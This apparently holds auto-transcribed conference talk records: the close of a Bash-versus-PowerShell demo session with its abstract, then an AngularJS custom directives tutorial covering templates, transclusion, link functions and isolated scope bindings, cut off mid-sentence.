fetching the stream. So in PowerShell everything as well is a stream. So you can pipe streams through the chain. But what's really, really neat here is that I have actually a JSON serialized structure. So you can just take a look here, data. I get auto completion. So there's issues. There's a lot of issues, apparently. So I'm just going to go ahead and say, let's see, give me the fields, actually. I think those are the ones that are actually, let's see. Here there's a fields property. I can actually just expand this one as well. So I'm just using the data structure I'm getting back to actually filter all this stuff. Interesting. So here are all the fields that's returned from the JSON structure on all the issues. So by using this information I can easily just say, I'm going to select something. I'm going to go ahead and say data issues, fields. Select. I'm going to go ahead and select, well, there's something called summary, I think. At least not summary. Type O. So data issues, fields, fields, and select summary. Summary. Was that right? Yeah. There we go. So now it fetched the summary. I could also go ahead and say, is there a creator? For you non-JR guys, it's basically a description of the issue. Creators. Yeah, there we go. And as you can see, there's a creator object. And I could go ahead and expand that object in my select method so I could expand the creator dot something, dot something. And I could actually make a really neat little list and export this JSON data to any format I want. So basically, if this is a JSON structure, I could easily just say, hey, give me this structure, convert to, and you see order completion. Nice. So convert to CSV, HTML, JSON, secure string, which doesn't make sense in this context. Convert to web application, no. But basically, I have a neat set of conversion methods just to play with the data. So it's quite easy. That's cool. That's right. So that was the small JIRA integration. And usually, that's quite useful if you have continuous integration or you have tasks that needs to be fetched and then combined with other stuff. It can be a really, really nice. Like putting together, for example, like your JIRA tasks with the code you committed or something like that, and you want to pull your commits and you have to put them together in some magic way and do something like that. So that's what kind of things you could do. And that's actually pretty neat. And I use that in my previous project quite a bit because where I wanted to see who committed what and what time and what kind of things we deliver whenever we do delivery, what kind of commits and what kind of JIRA cases issues that we're actually delivering and stuff like that. So it's actually pretty cool. It's actually good, useful stuff. Yeah. But also, another really annoying thing during your everyday life is working log hours. And just as a small example, I have this really neat little site which I proxied. It's one site I worked with earlier and I proxied it to local hosts. And it's not working in any other thing than IE. Oh, god. This is the fun part. So basically, if I pull this one up in Chrome, it shows me this. It works in PowerShell, right? Well, yeah, well, of course. Well, no. This is the thing I'm going to show you. If you have a really painful website, which only, well, is this IE? Yeah, this is IE. Wow, that's great. It doesn't work in the URL. I copied the URL. Oh, perfect. It's quite bad. So if I go here, it's working in IE. And in Chrome, it's not working. And this is a really great system. You have to manually register your work hours every freaking day. And it requires a username. There's no auto completion. It requires you to input the date and the project number. And there is really no help in this interface at all. No. And of course, you need to submit every day. So I could easily automate this. I could use something like Casper or a third-party integration tool, which might work, but no guarantees. Probably will. Yeah, if you tweak the headers a little bit and says that you are IE. But I could actually on Windows use the IE com object just because I like pain. It is a lot of pain. So I could say, I could go ahead and create a new object. I'm going to say com object and Internet Explorer, Internet Explorer application. I'm just going to go ahead and close this one. Oh, application. So save that and let's run that one. Now I have IE. So it's a com object. Wow. Wow. Yeah. It's amazing. Nice. It's a mess. Well, I mean, I think common com objects are bad enough. So I don't want to go back to any further. So by using the IE object, I could say navigate to. I could go ahead and say local hosts. I'm just going to go ahead and do this. I'm going to copy this to my scripts. So navigate to local host and I'm going to say IE visible equals true. So this is a really, really simple workflow so far. So executed and I have IE running in the background there. Oh, yeah. There we are. Oh, where did it go? There we are. So small little window. It doesn't really matter. But what I could do is I could say IE documents. I could say get element by ID, username, value. I could say my username. If this works, oh. Well, it's probably a typo somewhere. Value, text, text or value, value. I can't remember the DOM structure. Maybe something like this. Yeah, there we go. All right. So it set my value. Nice. So just by invoking these really small com object commands and using the DOM tree back, I could automate this process every day. And I could put it up as a scheduled task running every day at four just by inputting some data. For instance. Just random numbers. Just random numbers just to make the compliance work. There are a few people just like the numbers. So basically, how would you do this in Bash? Well, maybe not for the IE object. No, definitely not going to do it for IE objects really. It's, I don't want to do that. But anyway, but what I can do is to do it a bit more generic way. I have, let me start my little proxy here. I also created a tiny little proxy. And I kind of was looking for an example. And I was like, yeah, well, you have your hours thing, which is kind of, that would be lame to use the same. So I kind of wanted to find something else. So I thought of, I have a gym. I go to gym. I like to go there and they have classes and they have a system that kind of sucks a little bit. I mean, you have to sign up for the classes week before. And if you do that like five days instead of seven days before, it's probably everything is full and you have to wait and see and you know that kind of stuff. So what I did is just I made a proxy. I created a kind of a local version of that and I anonymized the whole thing. So you probably hopefully won't know what gym it is. Political reasons. For some political and legal reasons and kind of I don't want to get sued reasons. I also anonymized the whole names and everything. So basically it's like this and then you have your, so it's in a region, but basically it's a your center. Try a workout like gym set thing and then you go for like, okay, I want to go to this and I want to select, I want to go from Tuesday and it's like, oh, they have spinning on at seven o'clock in the morning. That's perfect. That's what I want to do in the morning before work. Sounds like good plan. Right. And then you sign in and okay, it says like, yeah, you're registered now. Right. So basically what you guys can do, I can just create a list of stuff and say that I want you to actually sign me up for those and those and those. And those classes. And that would be actually really cool. Right. So what I did is do to do it a little bit more generic way. You mentioned actually already Casper Casper jazz and I actually did that. I mean, again, I mean, I don't have anything built in. So I have to improvise. And that's what I did. And I created. Let's have a look at it. I think it's called sample. I created a tiny little file that does really simple stuff. I mean, it's like, that's not what you normally would do. But still, it basically would go and find, let's go to the top. This stuff would just turn on some debug. I removed that. But this is kind of a good thing to know. You can actually add some verbose mode and debugging and stuff. What would do what you want to do? It's like you go to your L and then you go like you set the size of your window. Just for fun of it. Because it's not a browser, so it doesn't know how big it is and stuff. Then you go to the first drop down. You select some kind of thing. You change it. The first drop down, you remember the center, right? Name of the center because they have different ones. Then the second drop down would be like a date. And I select some kind of date. And then I'll just click on a button. And let's see if I run that thing and see if demo effect actually, I hope it works. Well, I hope demo effect doesn't work, but I hope the script works. So let's see. All right. And what it did, I didn't show you that. At the end here, it actually takes a screenshot of how page would look. So if everything was right, there should be a page of like congratulations. You've been signed up for a course. So let's see. It is in development and battle. And there should be a screenshot. It is. And it is new, right? I mean, how, yeah, look, I've been booked. I have booked the spinning thing. And just see when it was created just to see that I didn't cheat or anything. Yeah, it's now. It's like 1714. That's right. Modified. Initiation termination sequence. All right. All right. That's kind of interesting. That was actually kind of a hint of what we have to do because we don't have that much time now. Notice the middle launcher. We're not going to get. Don't go there. Don't go there, really. So we thought it wouldn't be a battle unless we have some gadgets shooting at each other. So basically, we do what we did was actually, I basically added a DLL using the windows 8.1 USB hub library. So I hooked up this neatly USB missile launcher and then I had to think what should I use for something that contracts like a missile thing. Right. And then I thought like there are some guys that thought about that before and they almost hit me. Actually, I thought of you're going to need those. Yeah, probably going to need those for now. Then I thought like what kind of country, well, some kind of country that should not be named anyway, but that use something to contract missiles and everything. So I went for drones. Right. Let's see. Well, actually, you guys in the first row, we should practice like ducking. Just in case it goes towards you, just should we practice or you're cool? No, you're right. Perfect. Let me see. And then, of course, I mean, like it wouldn't be like a command line battle if we wouldn't use that stuff from command line. Right. So what we're going to do, we're going to actually control both of those things from command line. He's going to do it from poor shell. I'm going to control that thing from Bash. And I'm going to be, I'm going to go nice on you and I'm just going to do what I'm going to do is just go up, stay there, Hoover for a little while and just go down. All right. So then you have to hit it. That's right. Maybe your laptop is in the way. Yeah, we'll see. We'll see. I can do that. It's all right. Yeah, I can move. And let's see, do you want to switch just to show people what I'm actually doing? Sure. Okay. All right. I have a tiny little JavaScript here that would actually control the whole thing. And then I'm going to do like node. I'm using node.js for that. And drone. Remember ducking, right? Just go down. Just to be safe. Play dead, basically. If anything goes wrong, just play dead. Let's see. The moment of truth. You ready? Yeah. Die bash. Let's see. Oh, close. That's a miss. Oh, that's the wrong way. That's the wrong way. That's a miss. And miss again. No. It's landing. Too late. I can do it again. Move down. It's okay. I can do that again. I can shoot while it's down. No, it's not shoot when it's down. Come on. Yeah. Well, I would probably wrap it up now. All right. I have three more measles. Like, could probably hit it. Shoulda coulda woulda. But it just illustrates the point. You can easily integrate anything you want. And it's the power of the show. At the end, I want to really want to show you this one. It's really cool. That's how you can convert your server to a Kuku clock. It would just take the ejector cedar on. I mean, you have to have cedar on. You have to have a cedar on. You have to have a CD-ROM. You see it's an eject CD-ROM, and then it would make the cuckoo sound. So imagine somebody walking into the server room and just did that thing, just cuckooing there, you know. That would be so awesome. I just have to show you. Anyway, we're done. What way is it to show the score? Let's see. Oh, we have to show the score. Come on, two weeks. Let's see. Is there any score? Let's run this thing. Oh, I'm so excited. Oh, haha! 16-16. Oh, God. Oh, that's a good fight, then. Alright. Nicely done. Well done. Thank you. That concludes. So, if you have any questions, feel free to ask. That's my email and my Twitter. I'll post my Twitter. I'll show you mine. And you can easily find my email. And it's on the start of the slides anyways. And I can switch. You can switch and then I can show people my contact information as well. It's there. Just for the record. That's my Twitter and my email. Remember to vote the green for the yellow. Or the red. Or the red. How you like to talk. Yes. If you have any questions, feel free to come up here or just ask. Thank you. Thank you. Thank you.
|
Are you a Ninja or a Samurai? Ever wondered if you could switch from old-school Bash to a newcomer PowerShell? Or the other way around? Could one of them be as effective at the other one? Perhaps even better or easier to master? Want to find out? Come and see the epic dance off of a Bash command line ninja and PowerShell samurai. Find your favourite scripting platform, by watching us solve real-world problems using the two!
|
10.5446/50864 (DOI)
|
Good afternoon everybody. Good afternoon, I say. There we go. My name is Scott. I'd like to talk to you about directives for AngularJS. I'm kind of assuming that you might have worked with AngularJS already just a little bit, so you know some of the basics. But I want to drill into a specific area of AngularJS, the area that I find most difficult, found most difficult, well, there's still mysteries in there, writing directives for AngularJS, because I found it very easy to create controllers, services, manipulate scope, do data binding, ng-model, all that stuff. When it came to directives, every time I looked at the source code to directives or looked at someone else who is writing a directive, I found some new mysterious feature. So directives are beautiful, but they have some of the most terse shortcuts and syntax that you have to get used to and just magic behavior sometimes. So I actually want to give you two different perspectives on directives, because I believe there's two different ways to look at them. One way is that you can use directives to build this beautiful universe, which is the idyllic Norwegian landscape you see on one half of the screen. That is, you can use directives to make your markup, the code that you write in HTML a little bit prettier, a little more orientated towards the way you think and the way your team thinks and the UX problems that you're trying to solve. And then there's this other world of directives, which I'll also talk about, which you might never experience this, but directives really are the machinery that is in the basement of the building where it's very hot and greasy and no one really wants to be there, but it's what makes the whole thing work. So only the plumbers and the mechanics, like being in that room with all the machinery. But there are pieces of directives that operate that way, too. I mean, the entire form validation capabilities and the way NG model works with a form in Angular is quite amazing, but it's all this plumbing that is down there. We'll focus on the pretty scene first. The way I view this is that if you've ever heard of the code smell primitive obsession, it's about when you're using a language like C-Sharp, but you are representing your domain concepts using simple built-in primitives. So if I'm in a distributed messaging system, I'm modeling messages with a string. If I'm building something that needs to keep track of monetary values, I'm storing those values in a decimal. And that's all well and good until you reach a certain level of complexity. And then you realize that, oh, I have to know whether that's in this currency, or is it euros, is it US dollars? I don't know. It's just in this decimal. What is it? As HTML developers, we have a primitive obsession when we're building the UI, because all we have is primitives. We have things like divs. So everything becomes a div. And even though HTML5 introduced some new semantic markup, and I can have a header and a footer and sections and articles, all those wonderful things, most of what I write still comes out to be divs. I put divs inside of divs to create, sometimes, using bootstrap classes to create rows and columns. But yeah, it's all divs. Directives allow you to escape from that. And they're a very forward-looking part of AngularJS because the Google people that started AngularJS, they knew what specifications were coming down the road. And they wanted to orientate themselves towards those specifications. So if you look at specifications surrounding custom elements, web components, shadow DOM, these are things that directors are trying to give us in our applications and inside the browser today, until some point when all these newer specifications are finalized and they're in the browsers and our grandchildren are building web applications, they'll be able to actually use those standards. But until then, that was supposed to be funny. Thank you. There's things like Polymer. If you've heard of it, they allow you to build web components. There's X tags, which allow you to simulate web components. And then there's Angular. It's part of its pitch line. We're going to enhance your HTML. So how do they enhance your HTML? Well, let's take a look at this scenario where I have a div that I want to represent some alert that's going to be displayed to the user. And I'm using bootstrap.css. So I say this is a div. Class equals alert, alert-warning, alert-dismissable. Because I want it to be formatted a certain way and have a certain color and give the ability to the user to click on a button to make it go away. But when you look at that, it's all well and good that bootstrap uses this. They pretty much apply the single responsibility principle to CSS rules. So it's not just enough to give it a class of alert, because that only does some things. I have to be very specific and say class alert, alert-warning. But what if I could write it like this? What if I could just say alert-type equals warning and then include the content that I want? That can be nicer in many scenarios. If I wanted to do something like that today in an Angular application, that's when I would write a custom directive. And just so you know, the exercise that we're about to go through is to build something that works like that, so I can just write alert in the HTML. But it's already been built. You don't have to do this from scratch. I just think it's a nice example. There are already a couple Angular modules out there, Angular UI, that already wrap a lot of bootstrap. So you can just write accordions or alerts in your HTML and direct this, pick it up, and make things work. So let's jump into Visual Studio. And in my index.html, here's the bootstrap alert. Let me copy that and bring that here inside of the markup, inside of something that's contained in an alerts controller. And this is where I want to change this to just be an alert type equals warning. Get rid of all this class stuff. Yes, I still might want a button with the class of close so that it appears on the right. But I don't want to use bootstrap.js and jquery.js. If you've ever used bootstrap and you want things that are dismissible, you have to include those additional files, bootstrap.js and jquery.js. I just want to make it all work with Angular. So I want to build some sort of alert, and I want this warning to appear inside of it. And let's just see what it looks like now. So there's the bootstrap alert on the top, and then there's my alert, which isn't colored correctly and doesn't close when I click on the button. So the first thing we have to do is tell Angular that when you compile the markup in the DOM, you should be looking for an element with the name of alert. And the way we do that is by writing a directive. I already have an app.js file that is the module that is in effect for my HTML page. I have a controller on there. It doesn't do anything as yet. But now I need to write a directive called alert, so that's what Angular will look for. And I need to write a function so that when Angular is bootstrapping, it will invoke that function and get back what is known as the directive definition object, the DDO. Excuse me. It is what describes the capabilities and the behavior of alert to Angular. So it knows what to do when it sees that element in the HTML. And one of the things you can put inside of here is a template. So I could say template is a div. And let's just say for right now, I'm going to write out simple text, hello, NDC, or I guess this is a warning. Warning from NDC. Don't trust the Wi-Fi Troy hunts around somewhere with one of those pineapple devices. But is this going to work yet? No. Because by default, Angular directives, it only looks for attributes in HTML. It doesn't look for them as an element. So in other words, if I did a div alert, that would work. But I want it to be alert proper element type here. I do that with the restrict clause here. So I can say restrict this to elements and attributes. Make it work either way. It's just a shorthand syntax. So E for element, A for attribute. There's also C for class, which is quite interesting. Because if you say, I want to make this directive wire up to wherever a class equals alert appears, that can be quite effective with integrating with existing CSS that you might have, or existing libraries, or jQuery plugins that you're trying to replace. There's also M for HTML comment. But as far as I know, no one really uses that. So just pretend you didn't even see that. We're just going to stick with elements and attributes. And now, hopefully, if everything is working correctly and I refresh this, now my element is replaced with that template, which is warning from NDC. But most of us, well, there's many directives where you just can't inline the HTML. It's kind of messy, right? So I can also specify template URL, cut this out of here, and say, no, actually, you need to go to alert.html, which is a file I already have in this project. I'll just come over to alert.html, paste this in here without the double quotes. And just so we know things are working and it's updated, yes. So we pulled in that template. All right, so so far, I'm going to flip back to the slides for a second, just so I don't get lost. We've learned about restrict. What type of things should Angular be looking for in the HTML to instantiate and use this directive? And this is how I could write it also. Alert is an attribute now if I restrict to ENA. And we've learned about templates. So I can specify a template URL. And one thing that people commonly ask me about is when I'm running my Angular application, I see a dozen network request go off on the first page load for all of these little directive templates. Is there a way to prevent that? Well, if you look at node tools, specifically, there's a grunt task and a gulp task that can actually precompile all of your HTML templates together, spit out a JavaScript file for you that you load into the web page, and it will automatically deliver all of your templates at once from that JavaScript file, automatically puts them all into a cache factory that Angular calls $templatecache. So it doesn't have to do a lot of network requests for these small bits of HTML. So just a tip there if you're ever trying to optimize an application. Let's talk about transclusion. Transclusion is fun, funny, because it's one of those words that people used to pick on with Angular. They're like, transclusion, it's not even in the dictionary. What are you doing building this framework that's so weird? But it is in Wikipedia, by the way. Transclusion is just a term for saying, I want to lift the content of one document. Let's say this content. I'm going to lift it out of there and put it inside of something else. And that's what I want to do here. I want to be able to allow the user or the developer to write alert and then include whatever content they want. But I need to get whatever they want inside of there into my template somewhere. That's the goal. It's very easy with Angular because I can come into app.js. And first of all, I will set a flag. Transclusion is true. That tells Angular that transclusion is going to happen. And then in my template, I just need, instead of making up my own stuff, I'll use what the user said, which is ng transclude. And actually, now that I think about it, I don't think this is transclusion. This is transclude. Yes. So now I have successfully transcluded the content out here into there. And just so it looks different from the one above, let's say this is the Angular directive, which is spelled something close to that. So far, so good. So that's transclusion, very simple. Oh, yes. Thank you for letting me know. This is not large enough. Is that better? Thank you. So transclusion, there's actually two ways to do this. There's the easy way and there's the hard way. If you just place an element inside of your template that uses the ng-transclude directive, that is where the content will be placed into. Angular also has the concept of a transclusion function. If you have to do something really fancy when you transclude stuff, you want to manipulate that markup, you want to break it apart and put it in different places, that's where in the linking function, which we'll talk about later, you can ask for the transclusion function that you invoke and it will give you back all those pieces inside an array of strings. All right. Next stop it. Yeah, let's talk about link. So what do we not have working so far? Well, we don't have the colors. We don't have the ability to click this to close it. So one of the things that you can do with directives that you really shouldn't do anywhere else is manipulate the DOM directly by walking up and touching an element. So the link function that you provide is part of a directive definition object can include scope, element, and attributes automatically. That's not injectable like a lot of functions in Angular. Those are the set parameters that come to you. Scope, which is the current scope that you're operating with, by default, that scope is going to be the same scope as my controller that is outside that directive. The element, which is literally the HTML element that I'm operating with, it's wrapped with the JQLight API. If you haven't worked with Angular before, it offers an API around this element, which is very similar to JQuery's API when you wrap a DOM element with JQuery, but nearly as many methods and not nearly as many features. It's like the 20% of JQuery that you use 80% of the time. So yes, I can do things with this element like add class. So let's add a class of alert. And I would probably also need to add alert dash plus warning, but I want that to be parameterized. For right now, it's just hard coded. See if this works, because I think there's one more change I may have to do. But you understand where I'm going so far, right? I don't want the user to have to type class equals alert or anything that. I'm going to add it myself. Yeah, so the one thing that's a little bit off here I believe is by default Angular throws my template inside the original element, which isn't quite what I want. What I want to do actually is replace that element. That looks better. So I'm replacing that original alert element that was in there. And let's parameterize this. How can I parameterize this? Well, the nice thing about attributes is that I can walk up to attribute, sorry, and ask it, do you have something for type? And you might want to default it to something if it's not there. So you either specify a type or I'll default it to a type of info. And Bootstrap has a warning, info, error, something else too. Let's use that. Alert dash plus the type. Save everything. Very good. Let's just check this out. If in index.html I say the type actually one is warning or info, yeah. So it's a different color. It's the calm blue color. Let people know they shouldn't be concerned. And now what about the button click event? Well, before I write this, I'm going to tell you that the reason I'm writing this link function is just to demonstrate that inside of here you have access to the element and access to the attributes. And you can do anything you want to the DOM, read any of these attributes. But I have found that roughly 80% of the time I don't need to do this. I'll show you a better way to do this in just a few minutes. For right now, I just want to show you that you can do things like element.fine. So now what I want to do is inside of my element somewhere, I want to find the button. And actually, if the button should just be standard everywhere, I'm not going to force the developer to put a button in every place. I'm going to include that in my template, actually. So I'll put the button there and then transclude whatever other content they have. That should still work. I need to go and find that button. So find again, part of the JQ Lite API. But unlike JQuery, you cannot use just any selector inside of there. It won't let you select by class or ID or anything like that. You can only select by tag name, element name. If you need fancier DOM manipulation, what you might want to do is just include, you can use JQuery. And if JQuery is loaded before Angular, Angular will use JQuery instead of its own JQ Lite implementation. Let's find the button. Let's say when someone clicks on it, I want to do the following function. And by the way, you don't have the usual.click.mouse over things. You have to use on with the JQ Lite API. Let's just do something really devastating. Just remove the element from the DOM, see if this works. Refresh. And something went wrong. Oh, no. Something went wrong. My mouse didn't click correctly, I guess. If I click correctly, it goes away. So questions so far? No, I can see everyone's fascinated. Or half asleep, I'm not sure which. Oh, yes. Is that the best practice? Hello. Is there a better way of doing it? With element.find and on, there's better way to do it. I'm just demonstrating that you can do that inside of there. Yeah, let's do it a different way. I mean, one problem here is that once the type is set, it is always that type. So I'm going to show you a better way to do this. And along the way, I'll also show you how this could be a little more dynamic. Let's say, let's do this. Let's, inside the alerts controller, I want to set up a scope.alert, some sort of data structure that says, here's the message I want to display to the user. This is a warning. And the type of this is going to be a warning or maybe danger. So this is dangerous. Spelled something like that. And let's just use this to build our alerts. Over here in the main template, alert type equals, let me interpolate in alert.type. And let's replace this with message. And then I guess to make it really fancy, what I could do is add a button. ngclick equals change alert. Because what I want to do is make sure that this alert can respond to changes in the model. If someone changes the type or changes the message, I want that to make some visible difference in the page. If that makes sense. Does it make sense? OK. So over in the controller, let's add a scope.changeAlert. That is a function. So when the user clicks on this, we will say scope.alert.type equals info scope.alert.message. I could have just replaced the whole object, I guess. But we could say that was not a problem. Let's try this out. Refresh. I interpolated something wrong. Oh, right, right, right. Yeah, now we got a couple things going on. So in my index.html, I alert.message. That's the problem. Thank you. Yes. I was hoping that part would work. So if I change the alert, notice that the text changed. So the data binding just works, even though it's in that transclusion. I just changed the message. It changed what was on the screen. But the color didn't change. I also changed the info. But because of the way our directive was written, it only read that type once and just stuck it in as a class. So now what I need to do is I start needing to, from inside of my directive, be bound to something from the outside world in a more explicit manner. Message already takes care of that in one sense for me, because that is using ngbind. It's data binding into the page. But my alert type is not, because I have it read out once here and just throwing it in as an ad class. So here's what I want to do. I want to set up, sorry, before I do that, just one more thing I want to show you. What happens if we have two of these? Whoops, copy this and paste it. And here, instead of interpolating something, I'm just going to say, this is message two. This should drive him a good point. So now I have two instances of that directive on this page. And if I refresh and I click to close the first one, the second one disappears. This is mysterious behavior. If I click the second one, it goes away. Oh, and what happens if I keep clicking around? Well, oh, sorry, sorry, sorry, sorry. That was not working the way I expected it. I thought I was going to have a problem there. Well, ignore that part for now right now. Let me do this. Sorry. What if I want to give my users the ability to respond to some type of alert and say, all right, I'm going to read what you type into here, and I'll treat that as the reason that this alert happened. Maybe I can demonstrate that behavior this way. Yeah, so that's a little bit better. What happens when I type into the first directive is that it appears in the second directive. Because by default, the scope object that I'm receiving is the same as the controller I'm inside of. So it's this object. And since both directives are writing into the reason property into that same scope object, this stuff shows up both places. The other way I could have seen this, I forgot, is if I would have tried to do something like scope.close equals a function. And what function will do is element.remove. So I'm trying to get a little bit fancier and get rid of this fine stuff. I'm going to expose a close method on the scope object and tell it to remove an element. And I go into my alert.html. The other way I could have handled the close would be to say ng click equals close. See what that does. So I click on the first one, and the second one disappears. That time it happened, right? No? Yes? Yes. Yeah, I click on the first one. Second one goes away. Again, that's because these things are sharing the same scope object. So what is happening here is that when I write scope.close for the first directive on the screen, it grabs and forms a closure around the first directive element. And so if I were to just have one on the page, that would be fine. But the second instance comes along, rewrites that function, forms a closure around the second element. And that means it doesn't matter how many of these things I have here. I can only close the last one on the page. Does that make any sense? Maybe? I know it took a while for it to sink in for me. All right, so this is completely broken. I have all sorts of problems here. If I try to change an alert, things aren't updating. The color's not updating. If I try to close alerts, things aren't happening. What I really need to do is get away from using the same scope as my parent controller. What I want to do is create what's known as an isolated scope, which means my directive will get its own scope object. Things I put into it won't conflict with anything else. Just by writing that one line of code, well, three lines, but you could have put it on one line, just by isolating the directive like this. If I refresh and type in here, notice it doesn't appear in both anymore, because it's going into a reason property on that scope for the first directive instance. And this one is completely separate. But now, that fixes some problems. I'm not overwriting things. I should be able to close both of them now, so that part works. But I still need the ability to get the things to the outside world. I still need the ability to maybe, my controller wants to find out what this reason is. What did the user type inside of there? My controller might want to set messages independently. My controller might want to change the color still. So what we're going to do is look at a piece of Angular that honestly baffles a lot of people. We're going to look at how to set up binding between an isolated scope and the parent controller scope, or some expression that could represent anything. These isolated scopes, by the way. Usually, if you have a controller inside of a controller in Angular, the inner controller, its scope object prototypically inherits from the outer controller. It's not the case with directives. It doesn't matter where that directive is. It's isolated scope only prototypically inherits from root scope, which is the mother or the father of all scopes inside of an Angular application. But once you have one, which you do just by saying scope empty object, now you can start adding certain declarations inside of that isolated scope so that Angular will bind stuff to the outside world. So the first one we'll look at, well, we're going to look at three. We're going to look at at equals and ampersand. They are a way to form a bridge between some outer scope, a controller scope, root scope, somewhere, and an isolated directive scope. That's what these three things do. I want data from here to just automatically move into my isolated scope. And if I change it here, I want it automatically propagated back to my controller scope. That's the goal. Or I should say with an outside environment, because the first thing we'll look at, whoa, someone screwed up their animations there, is how to set the stage on fire. How can my scope reach out and grab an attribute value that is specified in the markup and keep things updated if that attribute value ever changes? That is the purpose of the at inside of an isolated scope. So when I say scope type is an at, that's telling Angular to automatically look for an attribute with the same name. It has to have the same name if I do it this way, type. And to take that value that is inside of it, info, and just automatically move it into that property of my scope object. So if I do this, I could say scope type attribute. I no longer need to do, I no longer need these attributes. I can get rid of them, whoops, but not the lower curly brace there. I don't need to read attributes anymore, because the attributes that I need, I can just move them in here. I could have as many of these as I want. So there could be a type, and there could be, you know, bind something called message as an attribute. But what this means is my scope will now have a type property. That type property will come from here. And for right now, let me get rid of the two alerts so it's not too confusing. That will come from here. Let me just hard code for a second, info, so we can see this working. And what I could do instead of that add class stuff inside of here, is also use some data binding out here and just say my class, I want it to be alert-type and interpolate it in. See if that works. Sorry. Yes, it's an info. So now let's try to wire it up dynamically. Instead of hard coding it, I want it to be alert.info. That's a problem. Typically, when you write an expression in Angular, like if you write an ng-model thing, you just write ng-model equals reason or ng-model equals alert.something. But when you do attribute binding, like so, Angular is always going to read out the string contents of the attribute directly. It's not going to try to treat this as some sort of expression to evaluate. Therefore, I always have to interpolate that with an explicit binding. So alert.info. And now if I come out here, it should. Whoops. Make sure I saved everything. It should. Should, should, should. Oh, sorry, what did I do? Oh, alert.type. Yes, it wouldn't have worked this way either without those. Just prove a point. Alert.type. And now if I change this alert, color changes too. So the attribute value changes that scope binding will automatically pull in the new value that gets placed in here and put it in, if that makes sense. All right, next thing I want to do is perhaps actually use this reason and try to get it out of that directive and into my controller or do some two-way data binding with it. And that is done with an equal. So if I say reason equals, what Angular is going to do is look for a reason attribute here and take this expression. So I don't need to interpolate it in anymore with the binding expressions. Take that expression and essentially set up a two-way data binding between that expression and my isolated scope. So if I change reason in the scope, it should automatically be pushed into whatever is specified here. And if anything is specified here or changes here in that expression, it should be pushed into my scope. In other words, let's come into our alert and let's start off with an initial reason, just say default reason, or please fill out anything like that. And then what I want to do in my HTML is I want to tell my directive that the reason it should be looking at is alert.reason. So I want to set up that binding there. And in order for that to work in the directive itself, I will need to say reason equals. So two-way binding there. And now just check my template real quick. I do have this set up to be ngModel equals reason. Yeah, so refresh the page. And you can see default reason appears there because it's pulling out of that expression, and if I change it, we're not showing it, but it would be pushed back into the controller. Let's show it real quick. Over an index HTML outside of the directive, let me bind the reason. And what we could also do, when someone clicks to change the alert, I could say scope.alert.reason, just blank it out or something. So that's data moving from the controller scope into my directive. That's information being changed in my isolated scope of being pushed out to the controller scope. And again, change it in controller scope, it gets pushed back into my isolated scope. Really interesting stuff, isn't it? I think. Simple, anyway. Once you understand the crazy little shortcut syntax, which is ampersand and equals. So we're just saying, look for an attribute and take that expression, bind it to my scope. And finally, there's ampersand, which is basically a way of saying, I expect this to bind to something that I can invoke by applying parentheses. And that's going to stimulate some behavior in the outside world. I don't know what it's going to do. It could close something. It could navigate somewhere, make a web service call. All I know is that in my isolated scope, I'm going to have a member called close. And if I invoke it, something's going to happen. So as a directive developer, I may want to say, I'm not going to close things myself. What I'm going to do is expose this close member to you. So if you set up that expression, I promise to invoke it at the right point of time. And then you decide what to do out there in the controller somewhere. But it has to be called close. So in the markup, when I'm using this directive, I can say, oh, you gave me a close. Well, for close, what I will do is say, let's invoke something on my scope called close alert. And let me just set up one additional thing here. I could say that this should only show when alert is truthy. So the template does an ng click equals close. Where that's going to map to now when someone clicks on that close button is it's going to come into my directive. And because of this binding, say, yeah, we're going to invoke a function that was given to us, an expression that was given to us. The expression that was given to us was close alert. So now let me go off and look for close alert on this outer controller scope. So inside the controller, it is now responsible for the closing stuff. So scope.close alert, notice the name is different. What it could do is just something like scope.alert equals null. That would be falsey. And I think I did everything correctly. So if I click on the close button, because of ng show, then it just gets rid of everything. Questions? I see concerned looks. For this one. Yes. Yeah, this, and I was confused by this for a long, long time. And I think it's kind of unfortunate with Angular. Some directives, when you use them as an attribute like this, you specify an expression. That is, if I type something in here like alert.type or alert.whatever, Angular is always, always, always going to treat that as an expression and something that has to be evaluated against scope. So that is telling Angular, because of the way ng show is built, please go up to the current scope object and look for a property called alert. And if it's truthy, we show things. If it's falsey, we hide things. So inside of ng show, I imagine they have something set up. Well, I won't pseudocode it. They could have an equals symbol there. They're doing model binding. But this one has to be interpolated, unfortunately, because my directive was written in such a way, where to go, up the screen, to use this attribute binding instead of the model binding. And so that's saying, just pull something out of the attribute for me. And quite often, you might want to do that, because a lot of times, people are building these things, and they don't want to put something in the model to get a value there. They really do just want to say type equals info and be done with it. But if they do that, that's fine the way I have things set up with act, but it's never going to be treated as an expression like this one. I need to say alert.type to make it dynamic and actually interpolate that into there. Confusing. And I used to get frustrated with it, actually. So I didn't know when to use double curlies and when to use an expression. So yeah, that's a good point. Just to go the other way, there are some directives like nginclude. This used to happen to me a lot. You would think, oh, nginclude, I just want a hard code of path here that says go to slash views slash partial slash login.html. Maybe a relative path. But nginclude treats this as an expression. So it walks up to your scope object and says, where's the views property? There is none. So this thing doesn't load. The way you treat this as a constant expression is to delicately place the single quotes around it so that that angular parser says, oh, that's a string. So yeah, we go to views paratotallies or whatever French word that is. You can get the login view. And I could do that here if I said type equals and used a single quote around this. If I refresh the page and look at the DOM, I imagine we'd see class equals squiggly is alert dash type there. That's not what I want, though. Good so far. More questions? Because this, if we just go back and review the directive briefly, wasn't a whole lot of work. And in fact, I added some additional strange features in there to demonstrate different things. But it might have made for a slightly nicer user experience, developer experience, to be able to say, hey, I want to write things like this, alert type equals, and just have all of things automatically closed and everything else for me. So yeah, some people call directives. Some people say that the directives give you the ability to write a DSL and HTML. Yeah, that's one way to think of it. Let's talk about some plumbing now, some of the mysterious parts of directives. So you can, inside of a directive, also specify a controller. In other words, in my directive, I could say controller is a function that takes scope and element. It also services if it wants services. Or I could say controller equals ng alert controller, something like that, specify it in a separate file. Angular will find it and attach it to this. Question is, why would I want a controller? What would I do in a controller that I couldn't do in the link function? Because we already saw the link function. You can attach events. You can manipulate the DOM. Controllers inside of a directive, to me, are good for two reasons. One is, if I have a lot of complicated logic or during calculations or manipulating scope, hopefully I won't do too much of that inside of a directive. But if I do, if I can pull that logic out of the linking function and into the controller, well, the controller is a separate, nice component that I can just instantiate in a unit test and fire some things off against the scope and write asserts. So it can often be easier to test a controller because it's just a function that modifies the scope. Easier to test that than link, which requires me to dig around with directives and do all sorts of other things. But the second reason to create a controller, which is quite often used inside of Angular itself, is to actually create an API for other directives to talk to each other. So if you create a controller for a directive and you create an API, not by adding things to scope, but by adding things to the controller object itself, so this dot and some 